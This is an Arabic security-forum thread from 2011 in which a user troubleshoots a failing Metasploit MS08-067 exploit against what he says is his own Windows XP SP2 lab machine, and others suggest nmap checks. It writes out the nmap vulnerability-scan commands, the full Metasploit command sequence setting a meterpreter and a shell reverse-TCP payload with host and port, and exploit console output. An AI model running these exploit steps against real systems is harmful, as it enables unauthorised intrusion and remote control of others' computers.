| مشكله فى language pack للميتا اسبلويت |
| الكاتب EGYPT SNIPER |
| الثلاثاء, 12 أبريل 2011 07:05 |
|
نجحت ف الاختراق بثغره MS08_067_NETAPI لكن بعد ذلك حدث هذا الخطاء ولم اعرف سببه [*] Started reverse handler on 192.168.1.100:4444 حاولت احدد ال TARGET لنوع النسخه و اللغه ولم ينجح الاستغلال علما بانى جربت هذه العمليه اكثر من مره على جهاز لى اخر.... وعلى نسختى فى برنامج VMWARE التعليقات (25)
  أرسلت بواسطة: زيد القريشي في April 12, 2011
الثغرة لم تعمل لديك , قد يكون سبب هذا اكثر من سبب ميعن فببساطة من الممكن ان يكون جهازك غير مصاب بالثغرة ... شيء اخر هل تستخدم نسخة معدلة من وندوز ؟؟؟
 أرسلت بواسطة: EGYPT SNIPER في April 13, 2011
هذه نسخه SP2 غير معدله ولم يتم عمل لها UPDATE
استغليت الثغره فى هذه النسخه ونجحت ف الاختراق وهذا يدل على توافر جميع الشروط للاستغلال ولكن حاولت مره اخرى فوجدت هذه المشكله
أرسلت بواسطة: EGYPT SNIPER في April 14, 2011
يا اخوانى هذه النسخه قمت باختراقها بالفعل وهذا يدل على ان الجهاز مصاب وهناك ثغره تم استغلالها........ولم اقم بالتعديل عليها بعد ذلك سواء ان كان عمل UPDATE للنسخه او تسطيب برامج ...فقمت بتجربه الاختراق ولم ينجح وظهرت هذه المشكله
 أرسلت بواسطة: أحمد العنترى في April 14, 2011
ممكن ناتج الامر:
nmap -sS -T5 -p445 --script smb-check-vulns.nse X.X.X.X مع تغير ال X.X.X.X بال ip
أرسلت بواسطة: EGYPT SNIPER في April 14, 2011
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-04-14 15:27 EET
Nmap scan report for 192.168.1.106 Host is up (0.00039s latency). PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: 00:17:31:4F:31:AD (Asustek Computer) Host script results: | smb-check-vulns: | Conficker: UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED). | | If you know the remote system is Windows, try rebooting it and scanning | |_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND) | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run) | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run) |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run) Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
أرسلت بواسطة: أحمد العنترى في April 14, 2011
[root@localhost ~]# nmap -sS -T5 -p445 --script smb-check-vulns.nse 192.168.1.15
Starting Nmap 5.50 ( http://nmap.org ) at 2011-04-14 16:44 EET Nmap scan report for 192.168.1.15 Host is up (0.00049s latency). PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: 6C:F0:49:6D:60:5C (Giga-byte Technology Co.) Host script results: | smb-check-vulns: | MS08-067: VULNERABLE | Conficker: Likely CLEAN | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run) | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run) |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run) Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
أرسلت بواسطة: أحمد العنترى في April 14, 2011
لاحظ الفرق وشوف ال nmap هيقول لك ايه
اعمل restart واتاكد انك مش مشغل auto update
أرسلت بواسطة: EGYPT SNIPER في April 15, 2011
قمت بعمل ريستارت وAUTO UPDATE غير مفعل من وقت تسطيب النسخه
نفس المشكله هل يوجد اى اسكربت لحل هذه المشكله؟
 أرسلت بواسطة: Mohammad AlQarni في April 16, 2011
السلام عليكم اخي
ياليت تكتب لنا الاوامر التي قمت بكتابتها للميتاسبلويت لكي نقوم بمساعدتك
أرسلت بواسطة: EGYPT SNIPER في April 17, 2011
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.111 set rhost 192.168.1.106 set lport 4444 على ما اعتقد ان هذه الاوامر صحيحه لان الاختراق نجح لعده مرات ولكن حدث امر مفاجئ ادئ الى عدم نجاح الاختراق مره اخرى وظهور هذه المشكله فاريد ان اعرف ماذا حدث ..او اريد ان اعرف اى طريقه لحل هذه المشكله وشكرا لتعاونكم الجاااد معى..
أرسلت بواسطة: EGYPT SNIPER في April 18, 2011
set PAYLOAD windows/shell_reverse_tcp
تم استخدام العديد من البايلود غير meterpreter ونفس المشكله قائمه اعتقد انها ليست مشكله البايلود
أرسلت بواسطة: EGYPT SNIPER في April 19, 2011
المشكله بدات تواجهننى بكثره ....بمعنى انه لم ينجح الاختراق نهائيا بسبب هذه المشكله
أرسلت بواسطة: أحمد العنترى في April 19, 2011
الجهاز غير مصاب بالثغره
اعمل flush لل dns وحاول مره كمان بس من ناتج ال nmap ان الجهاز مش مصاب
أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
وهنا بيتعرف ع اللغه لكن لم يتعرف على service pack
ما الحل؟